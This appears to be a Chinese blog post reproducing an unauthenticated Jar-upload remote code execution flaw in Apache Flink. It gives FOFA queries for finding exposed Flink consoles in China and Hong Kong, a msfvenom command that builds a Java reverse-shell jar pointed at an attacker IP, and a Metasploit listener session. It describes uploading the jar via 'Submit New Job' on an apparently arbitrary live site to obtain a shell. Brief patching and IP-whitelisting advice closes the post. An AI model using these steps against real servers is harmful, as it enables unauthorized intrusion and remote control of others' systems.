Apache Flink 未授權(quán)訪問+遠(yuǎn)程代碼執(zhí)行
Apache Flink 未授權(quán)訪問+遠(yuǎn)程代碼執(zhí)行
前言
近日,有安全研究員公開了一個Apache Flink的任意Jar包上傳導(dǎo)致遠(yuǎn)程代碼執(zhí)行的漏洞,影響范圍:<= 1.9.1(最新版本) 此次復(fù)現(xiàn)就是通過版本Version: 1.10.1進(jìn)行復(fù)現(xiàn)利用。
FOFA
FOFA?語句
app="Apache-Flink"?&&?country="CN"
app="Apache-Flink"?&&?country="CN"?&&?region="HK"

國內(nèi)還是很多使用 Apache Flink 的,大概有1K+的數(shù)量左右
漏洞復(fù)現(xiàn)
1、這里隨便搞個站打開進(jìn)行復(fù)現(xiàn),打開以后就長這樣子。

點(diǎn)擊Submit New Job翻譯:文件上傳
2、打開MSF 生成一個 jar 木馬
msfvenom?-p?java/meterpreter/reverse_tcp?LHOST=**.***.59.61??LPORT=4444?-f?jar?>?testone.jar

3、點(diǎn)擊 Add 上傳 jar 文件

4、設(shè)置監(jiān)聽端口
msf5?>?use?exploit/multi/handler
[*]?Using?configured?payload?generic/shell_reverse_tcp
msf5?exploit(multi/handler)?>?set?payload?java/shell/reverse_tcp?
payload?=>?java/shell/reverse_tcp
msf5?exploit(multi/handler)?>?set?lhost?XX.XXX.XX.61
lhost?=>?XX.XXX.XX.61
msf5?exploit(multi/handler)?>?set?lport?4444
lport?=>?4444
msf5?exploit(multi/handler)?>?run

5、點(diǎn)擊下 submit

6、反彈shell成功

修復(fù)建議
建議用戶關(guān)注Apache Flink官網(wǎng),及時獲取該漏洞最新補(bǔ)丁。臨時解決建議 設(shè)置IP白名單只允許信任的IP訪問控制臺并添加訪問認(rèn)證。
- END -評論
圖片
表情
